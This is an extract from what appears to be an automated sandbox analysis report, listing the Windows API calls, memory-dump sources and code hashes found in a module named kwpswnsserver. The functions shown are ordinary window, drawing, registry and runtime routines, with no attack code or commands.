                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1913693674-0
                                                                  • Opcode ID: 941f9021e84c79a7e7b4215005694f43c09c9a56532b8aeae09b02aa5dcdc6fd
                                                                  • Instruction ID: 6f903875604a7fbf37a85ec254c8fafc191524557c9ca6bd4bdd68906f2dc3e1
                                                                  • Opcode Fuzzy Hash: 941f9021e84c79a7e7b4215005694f43c09c9a56532b8aeae09b02aa5dcdc6fd
                                                                  • Instruction Fuzzy Hash: 7821A471604A16AFD7109F6ACC8095AF7ACEF2136C706C618F858A7A50EB30FC119BD2
                                                                  APIs
                                                                  • RedrawWindow.USER32(00000041,?,?,00000041), ref: 6C8849A2
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 6C8849E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: InflateRectRedrawWindow
                                                                  • String ID:
                                                                  • API String ID: 3190756164-0
                                                                  • Opcode ID: 8c11fdf6df36700a2f13a7a46c87d4c7050c948d3ad7f6d609b8b7319af96a94
                                                                  • Instruction ID: db21bb6ab78f236ef41a763afaa1329ec3dc7e378e4bd72ac8bba76ca84e1a1d
                                                                  • Opcode Fuzzy Hash: 8c11fdf6df36700a2f13a7a46c87d4c7050c948d3ad7f6d609b8b7319af96a94
                                                                  • Instruction Fuzzy Hash: 6C21517160420EEBCF14DFE8CE54CAE7779BB463687508B29B921A71D0DB35990ADB20
                                                                  APIs
                                                                  • GetClientRect.USER32(?,?), ref: 6C8BCB79
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BCBA3
                                                                    • Part of subcall function 6C8BA812: ScreenToClient.USER32(?,?), ref: 6C8BA82E
                                                                    • Part of subcall function 6C8BA812: GetParent.USER32(?), ref: 6C8BA83E
                                                                    • Part of subcall function 6C8BA812: GetClientRect.USER32(?,?), ref: 6C8BA8D1
                                                                    • Part of subcall function 6C8BA812: MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BA8E3
                                                                    • Part of subcall function 6C8BA812: PtInRect.USER32(?,?,?), ref: 6C8BA8F3
                                                                  • MapWindowPoints.USER32(?,?,?,00000001), ref: 6C8BCBCC
                                                                  • SendMessageW.USER32(?,00000202,?,?), ref: 6C8BCBEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$PointsWindow$MessageParentScreenSend
                                                                  • String ID:
                                                                  • API String ID: 2689702638-0
                                                                  • Opcode ID: 80ba4cce72d2f353a47d70d8c5e7d7d15053a7d64f9bb1b9e9a493d6023476c2
                                                                  • Instruction ID: 939aa8ee82af229eea0f3429f2a82adabff698a729cdb91bded783590796fa9a
                                                                  • Opcode Fuzzy Hash: 80ba4cce72d2f353a47d70d8c5e7d7d15053a7d64f9bb1b9e9a493d6023476c2
                                                                  • Instruction Fuzzy Hash: 1A31D73160070AEFCF26EF29CD148AE7BB5FF44354B118A2AF45A97610EB31A911DF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ad46740a3c4e2e55e27d0eeab42283606646b0a20943ab5d6b0d54439d36a8cc
                                                                  • Instruction ID: fc9d2c381cc999cce703e0036cd64c90c573a3c43cdca925813823ce09446157
                                                                  • Opcode Fuzzy Hash: ad46740a3c4e2e55e27d0eeab42283606646b0a20943ab5d6b0d54439d36a8cc
                                                                  • Instruction Fuzzy Hash: 5B113A31300759ABFB202BA5CC08B8B3B7CFB42768F13C250E515E7690EB71ED0192A2
                                                                  APIs
                                                                  • KillTimer.USER32(?,0000EC17), ref: 6C8BC875
                                                                  • KillTimer.USER32(?,0000EC18), ref: 6C8BC883
                                                                  • IsWindow.USER32(?), ref: 6C8BC8F3
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 6C8BC91A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: KillTimer$MessagePostWindow
                                                                  • String ID:
                                                                  • API String ID: 3970157719-0
                                                                  • Opcode ID: da763db16c00d5080f18dc52162802d851d462f179b555a2487d4cf2feb7d41a
                                                                  • Instruction ID: 7ee57af6f3619f758957d7fb0af5e753b454ecd9656856779eff231bd9de609d
                                                                  • Opcode Fuzzy Hash: da763db16c00d5080f18dc52162802d851d462f179b555a2487d4cf2feb7d41a
                                                                  • Instruction Fuzzy Hash: 9021CF31700316AFEB18AF64CD54B9DB7B5FB45305F204169D946AB791DB70A801CB90
                                                                  APIs
                                                                  • GetClientRect.USER32 ref: 6C8BCC85
                                                                  • PtInRect.USER32(?,?,?), ref: 6C8BCC9E
                                                                    • Part of subcall function 6C8BA812: ScreenToClient.USER32(?,?), ref: 6C8BA82E
                                                                    • Part of subcall function 6C8BA812: GetParent.USER32(?), ref: 6C8BA83E
                                                                    • Part of subcall function 6C8BA812: GetClientRect.USER32(?,?), ref: 6C8BA8D1
                                                                    • Part of subcall function 6C8BA812: MapWindowPoints.USER32(?,?,?,00000002), ref: 6C8BA8E3
                                                                    • Part of subcall function 6C8BA812: PtInRect.USER32(?,?,?), ref: 6C8BA8F3
                                                                  • MapWindowPoints.USER32(?,?,?,00000001), ref: 6C8BCCD4
                                                                  • SendMessageW.USER32(?,00000201,?,?), ref: 6C8BCCF3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Client$PointsWindow$MessageParentScreenSend
                                                                  • String ID:
                                                                  • API String ID: 2689702638-0
                                                                  • Opcode ID: 751897f4fe4b14e055151a157c5522e1c1a17490b7f792a29e8e01d8849d55da
                                                                  • Instruction ID: 6b4bfcb904b7546e9f8d2a9929d7ec6676f46bace7aebca7023afebfa97c84b6
                                                                  • Opcode Fuzzy Hash: 751897f4fe4b14e055151a157c5522e1c1a17490b7f792a29e8e01d8849d55da
                                                                  • Instruction Fuzzy Hash: 90218331A0030AEFDF159F65CD14AEE7BB6FF48304F108519F81AA2650E771A955DF90
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C88EEBC
                                                                  • SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C88EEE6
                                                                  • GetCapture.USER32 ref: 6C88EEFC
                                                                  • SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6C88EF0B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Capture
                                                                  • String ID:
                                                                  • API String ID: 1665607226-0
                                                                  • Opcode ID: 9f010f6033c08d61d42281cbca1254916836fc63e8171405ddf62e5e1c4f0525
                                                                  • Instruction ID: 234da8e2cc7d8b9df2ef7fbc26e6cd90156d048acf50763e94d3c4e64a72ff55
                                                                  • Opcode Fuzzy Hash: 9f010f6033c08d61d42281cbca1254916836fc63e8171405ddf62e5e1c4f0525
                                                                  • Instruction Fuzzy Hash: B911A57530161E7FEE352B249C89FBA7A6EFB48789F040524F60597AD1DB505C0196A0
                                                                  APIs
                                                                  • GetCursorPos.USER32(00000000), ref: 6C892203
                                                                  • GetWindowRect.USER32(?,?), ref: 6C89221F
                                                                  • PtInRect.USER32(?,00000000,00000000), ref: 6C89222F
                                                                  • CallNextHookEx.USER32(?,?,?), ref: 6C892257
                                                                  Similarity
                                                                  • API ID: Rect$CallCursorHookNextWindow
                                                                  • String ID:
                                                                  • API String ID: 3719484595-0
                                                                  • Opcode ID: e95cfd9da58618015a78e08ee3577ae90aa9f0fae435a1c1dbe9898273d0983c
                                                                  • Instruction ID: d335883ae410df085c62725b7cc28f459a193d3c1e1c725c86c17df215870614
                                                                  • Opcode Fuzzy Hash: e95cfd9da58618015a78e08ee3577ae90aa9f0fae435a1c1dbe9898273d0983c
                                                                  • Instruction Fuzzy Hash: D3218136A0121BABCF14DFA8CE58BEE7BB4FF09309F10C518A110E2550C734A6529B91
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8D01DA
                                                                  • IsRectEmpty.USER32(?), ref: 6C8D01FC
                                                                    • Part of subcall function 6C935F59: __EH_prolog3_GS.LIBCMT ref: 6C935F60
                                                                    • Part of subcall function 6C935F59: CreateCompatibleDC.GDI32(00000000), ref: 6C935FC4
                                                                    • Part of subcall function 6C935F59: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6C935FFA
                                                                    • Part of subcall function 6C935F59: SelectObject.GDI32(?,00000000), ref: 6C93604E
                                                                  • IsRectEmpty.USER32(?), ref: 6C8D0240
                                                                  • FillRect.USER32(?,?,-000000A0), ref: 6C8D0261
                                                                  Similarity
                                                                  • API ID: Rect$CompatibleCreateEmpty$BitmapFillH_prolog3H_prolog3_ObjectSelect
                                                                  • String ID:
                                                                  • API String ID: 2706196367-0
                                                                  • Opcode ID: acd19552210b7ecac7991f9dbf8e18f69e29b8e374ffb375b10d21d5612cdce1
                                                                  • Instruction ID: af71258e1d2e9a4eb9f4babe505d5b9044c68517445a9e1221b7f91e8c2df490
                                                                  • Opcode Fuzzy Hash: acd19552210b7ecac7991f9dbf8e18f69e29b8e374ffb375b10d21d5612cdce1
                                                                  • Instruction Fuzzy Hash: C4118171501149AFCF54DFA4CE44EDE3378BF14319F154A29A415E3A90DB34E518CB61
                                                                  APIs
                                                                  • GetObjectW.GDI32(?,0000000C,?), ref: 6C88EB29
                                                                  • SetBkColor.GDI32(?,?), ref: 6C88EB33
                                                                  • GetSysColor.USER32(00000008), ref: 6C88EB43
                                                                  • SetTextColor.GDI32(?,?), ref: 6C88EB4B
                                                                    • Part of subcall function 6C8A0147: GetWindowLongW.USER32(?,000000F0), ref: 6C8A0162
                                                                    • Part of subcall function 6C8A0147: GetClassNameW.USER32(?,?,0000000A), ref: 6C8A0177
                                                                    • Part of subcall function 6C8A0147: CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,combobox,000000FF,?,?,?,?,?,?,?,?,?,6C8879A6), ref: 6C8A018E
                                                                  Similarity
                                                                  • API ID: Color$ClassCompareLongNameObjectStringTextWindow
                                                                  • String ID:
                                                                  • API String ID: 3274569906-0
                                                                  • Opcode ID: 83bc10775d363225002dc0c8ad7ee388dd8c4d1d1725a5b13c3abe7f0c4c4d51
                                                                  • Instruction ID: d28085918720a39d960df3b94ce6857e59d763b8e1cf010c3fa6f8e710affa93
                                                                  • Opcode Fuzzy Hash: 83bc10775d363225002dc0c8ad7ee388dd8c4d1d1725a5b13c3abe7f0c4c4d51
                                                                  • Instruction Fuzzy Hash: 2F016535602219BBDB349E688E409AE77B9EF06A18F604915F936E39C4D730D9018794
                                                                  APIs
                                                                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,00000000), ref: 6C89A756
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 6C89A75F
                                                                  • swprintf.LIBCMT ref: 6C89A77C
                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C89A78D
                                                                    • Part of subcall function 6C89AC99: RegCloseKey.ADVAPI32(00000000,?,?,?,?,6C89A6C8,?,00000000), ref: 6C89ACDE
                                                                  Similarity
                                                                  • API ID: Close$PrivateProfileStringValueWriteswprintf
                                                                  • String ID:
                                                                  • API String ID: 581541481-0
                                                                  • Opcode ID: 22328965944d0caea76a8b674d2d42f99a162dc2e9d808c12921235a40a73a1a
                                                                  • Instruction ID: 9f0979fc06f6b13bab1adf243b9aab650767bc653ed9c4df8bdc0f8ef63d5aa9
                                                                  • Opcode Fuzzy Hash: 22328965944d0caea76a8b674d2d42f99a162dc2e9d808c12921235a40a73a1a
                                                                  • Instruction Fuzzy Hash: 9001C072A00309BBDB21DE68CD85FEE73BCAF49608F11482AF605E7680DB74ED058760
                                                                  APIs
                                                                    • Part of subcall function 6C89BA82: GetWindowLongW.USER32(F04D8BF4,000000F0), ref: 6C89BA8F
                                                                  • GetForegroundWindow.USER32 ref: 6C8C61CD
                                                                  • GetLastActivePopup.USER32(?), ref: 6C8C61E2
                                                                  • SendMessageW.USER32(?,0000036D,00000040,00000000), ref: 6C8C61FE
                                                                  • SendMessageW.USER32(?,0000036D,00000004,00000000), ref: 6C8C621A
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$ActiveForegroundLastLongPopup
                                                                  • String ID:
                                                                  • API String ID: 2039223353-0
                                                                  • Opcode ID: e821f92a74368c0a3a85b5845f107702d063d89f70a150988f295445e7969b6f
                                                                  • Instruction ID: fe0b9af5263909e24799dece4a43f209444d28e68554a40be09a0b8d30ec222b
                                                                  • Opcode Fuzzy Hash: e821f92a74368c0a3a85b5845f107702d063d89f70a150988f295445e7969b6f
                                                                  • Instruction Fuzzy Hash: 550142323017116BEA313B79AE14FFA2A29BB45B5CF214D38FA25D6DC0DBA2C8014201
                                                                  APIs
                                                                  • GetDlgCtrlID.USER32(?), ref: 6C886E87
                                                                  • GetScrollPos.USER32(?,00000002), ref: 6C886E9A
                                                                  • SendMessageW.USER32(?,00000114,?,?), ref: 6C886ED4
                                                                  • SetScrollPos.USER32(?,00000002,?,00000000), ref: 6C886EF2
                                                                  Similarity
                                                                  • API ID: Scroll$CtrlMessageSend
                                                                  • String ID:
                                                                  • API String ID: 1219558039-0
                                                                  • Opcode ID: 00160c218d0c8903930a790a39f6cb860b76cc5ddd999a3aa271818b4c905f39
                                                                  • Instruction ID: bcde98115a285f63b291d28ec6f6e2924dc3120c2c176fc315d684b3b5b8a2f5
                                                                  • Opcode Fuzzy Hash: 00160c218d0c8903930a790a39f6cb860b76cc5ddd999a3aa271818b4c905f39
                                                                  • Instruction Fuzzy Hash: DB11AC72600228EFEB219F68CC49EAE7B75FF89384F014969F945AB150D670AC119B60
                                                                  APIs
                                                                  • GetDlgCtrlID.USER32(?), ref: 6C886F18
                                                                  • GetScrollPos.USER32(?,00000002), ref: 6C886F2B
                                                                  • SendMessageW.USER32(?,00000115,?,?), ref: 6C886F65
                                                                  • SetScrollPos.USER32(?,00000002,?,00000000), ref: 6C886F83
                                                                  Similarity
                                                                  • API ID: Scroll$CtrlMessageSend
                                                                  • String ID:
                                                                  • API String ID: 1219558039-0
                                                                  • Opcode ID: 49574bb3c3052f78dbd76eb04982027c043693366205c57d935e1bbb1500401c
                                                                  • Instruction ID: 5f670d9f8b39b9a6ffa8a45c348438af2eb9f45e5e677451263f82e84f666877
                                                                  • Opcode Fuzzy Hash: 49574bb3c3052f78dbd76eb04982027c043693366205c57d935e1bbb1500401c
                                                                  • Instruction Fuzzy Hash: 3011AC32610224EFDB219F68CC49EAA7B76FF89344F0049A9F905AB151E770AC11DB60
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: OffsetRect
                                                                  • String ID:
                                                                  • API String ID: 177026234-0
                                                                  • Opcode ID: e63c8c75e53e9dd14a2dc06755d5259dda3f53c9ea3124fea549a3400fa9b8b8
                                                                  • Instruction ID: 47bcf8c49bdcd21252f567ebda7d0fe73741988d4b8b0fb350e4e6a200d6ffe5
                                                                  • Opcode Fuzzy Hash: e63c8c75e53e9dd14a2dc06755d5259dda3f53c9ea3124fea549a3400fa9b8b8
                                                                  • Instruction Fuzzy Hash: E5014472601214AFCF149FADCC88D967BBCFF85255B048569FD09CB205DA30E845CBA0
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8CA95E
                                                                  • FillRect.USER32(?,?,-000000D0), ref: 6C8CA983
                                                                  • CreateSolidBrush.GDI32(000000FF), ref: 6C8CA99E
                                                                  • FillRect.USER32(00000000,00000000,00000000), ref: 6C8CA9B7
                                                                  Similarity
                                                                  • API ID: FillRect$BrushCreateH_prolog3Solid
                                                                  • String ID:
                                                                  • API String ID: 1242064992-0
                                                                  • Opcode ID: 83de3d193d0b9cde0a38f0920e676f2b037b4cb49eda10c9d420d92afd930792
                                                                  • Instruction ID: 4bc50cebb38ccf38af5504e10bb2b90c20ee59a2ecd6fe56ae99bf913aa6c721
                                                                  • Opcode Fuzzy Hash: 83de3d193d0b9cde0a38f0920e676f2b037b4cb49eda10c9d420d92afd930792
                                                                  • Instruction Fuzzy Hash: 9411BFB150124A9FCB20DF98CE05AEE7B74BF04319F014615F421A7A90D770E919CBA1
                                                                  APIs
                                                                  • InflateRect.USER32(?,00000002,00000002), ref: 6C8B438F
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 6C8B43A3
                                                                  • UpdateWindow.USER32(?), ref: 6C8B43AC
                                                                  • SetRectEmpty.USER32(?), ref: 6C8B43B3
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3561481712.000000006C851000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000003.00000002.3561451754.000000006C850000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561634134.000000006C9FA000.00000002.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561692910.000000006CA50000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561725321.000000006CA53000.00000008.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA55000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561757396.000000006CA57000.00000004.00000001.01000000.00000006.sdmp
                                                                  • Associated: 00000003.00000002.3561822280.000000006CA5D000.00000002.00000001.01000000.00000006.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_6c850000_kwpswnsserver.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EmptyInflateInvalidateUpdateWindow
                                                                  • String ID:
                                                                  • API String ID: 3040190709-0
                                                                  APIs
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 6C882260
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 6C88226F
                                                                  • IsWindow.USER32(00000000), ref: 6C882280
                                                                  • SetWindowLongW.USER32(00000000,000000F0,?), ref: 6C882290
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID:
                                                                  • API String ID: 847901565-0
                                                                  APIs
                                                                  • GetTopWindow.USER32(?), ref: 6C88ED75
                                                                  • GetTopWindow.USER32(00000000), ref: 6C88EDB8
                                                                  • GetWindow.USER32(00000000,00000002), ref: 6C88EDDA
                                                                  Similarity
                                                                  • API ID: Window
                                                                  • String ID:
                                                                  • API String ID: 2353593579-0
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,00000001), ref: 6C88ED01
                                                                  • GetTopWindow.USER32(00000000), ref: 6C88ED0E
                                                                    • Part of subcall function 6C88ECF7: GetWindow.USER32(00000000,00000002), ref: 6C88ED5D
                                                                  • GetTopWindow.USER32(?), ref: 6C88ED42
                                                                  Similarity
                                                                  • API ID: Window$Item
                                                                  • String ID:
                                                                  • API String ID: 369458955-0
                                                                  APIs
                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6C9E9560,00000000,00000001,00000000,?,?,6C9E2096,?,00000000,00000000), ref: 6C9EA590
                                                                  • GetLastError.KERNEL32(?,6C9E9560,00000000,00000001,00000000,?,?,6C9E2096,?,00000000,00000000,?,?,?,6C9E19DC,00000000), ref: 6C9EA59C
                                                                    • Part of subcall function 6C9EA5ED: CloseHandle.KERNEL32(FFFFFFFE,6C9EA5AC,?,6C9E9560,00000000,00000001,00000000,?,?,6C9E2096,?,00000000,00000000,?,?), ref: 6C9EA5FD
                                                                  • ___initconout.LIBCMT ref: 6C9EA5AC
                                                                    • Part of subcall function 6C9EA5CE: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C9EA56A,6C9E954D,?,?,6C9E2096,?,00000000,00000000,?), ref: 6C9EA5E1
                                                                  • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6C9E9560,00000000,00000001,00000000,?,?,6C9E2096,?,00000000,00000000,?), ref: 6C9EA5C1
                                                                  Similarity
                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                  • String ID:
                                                                  • API String ID: 2744216297-0
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 6C9C20D3
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C9C20E2
                                                                  • GetCurrentProcessId.KERNEL32 ref: 6C9C20EB
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C9C20F8
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  APIs
                                                                    • Part of subcall function 6C8C7140: GetStockObject.GDI32(00000000), ref: 6C8C7168
                                                                    • Part of subcall function 6C8C7140: InflateRect.USER32(?,000000FF,000000FF), ref: 6C8C7217
                                                                  • ReleaseCapture.USER32 ref: 6C8C6EBD
                                                                  • GetDesktopWindow.USER32 ref: 6C8C6EC3
                                                                  • LockWindowUpdate.USER32(00000000,00000000), ref: 6C8C6ED3
                                                                  • ReleaseDC.USER32(?,?), ref: 6C8C6EE9
                                                                  Similarity
                                                                  • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                  • String ID:
                                                                  • API String ID: 1260764132-0
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                  • API String ID: 3732870572-1956417402
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 6C8A8527
                                                                  • CoCreateGuid.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,00000028), ref: 6C8A8582
                                                                  Strings
                                                                  • %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X, xrefs: 6C8A85CC
                                                                  Similarity
                                                                  • API ID: CreateGuidH_prolog3_
                                                                  • String ID: %08lX%04X%04x%02X%02X%02X%02X%02X%02X%02X%02X
                                                                  • API String ID: 2971167768-1017209998
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 6C8FE227
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,?,00000008,6C8B0617,?,MFCToolBars,?,000000A8), ref: 6C8FE372
                                                                  Similarity
                                                                  • API ID: H_prolog3QueryValue
                                                                  • String ID: SOFTWARE\
                                                                  • API String ID: 2373586757-3302998844
                                                                  • Opcode ID: 1439b3f74dbbbee11597fc06715c33ea5d9eeea2ae211f8a363424601e926331
                                                                  • Instruction ID: 2e577d18cff77eaee353b3868954f82c2cbd0de45d9b1b99a0247243a6c9ea2d
                                                                  • Opcode Fuzzy Hash: 1439b3f74dbbbee11597fc06715c33ea5d9eeea2ae211f8a363424601e926331
                                                                  • Instruction Fuzzy Hash: F831C271201614AFDF249BA8CE84DBE776AEF45218B108869F424ABF90DB70DD45CBE0
                                                                  APIs
                                                                  • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,6C9D8C84,?,?,00000000,00000000,00000000,?), ref: 6C9D8DA8
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: EncodePointer
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 2118026453-2084237596
                                                                  • Opcode ID: d54cce17c446722c818a5753b532deaadd4340c9a1e4203fe9ef634155d92e7a
                                                                  • Instruction ID: 379d7af45014fcc068bad9fdeba0fad39f79f36bd76427c7a0071a48ae5d230b
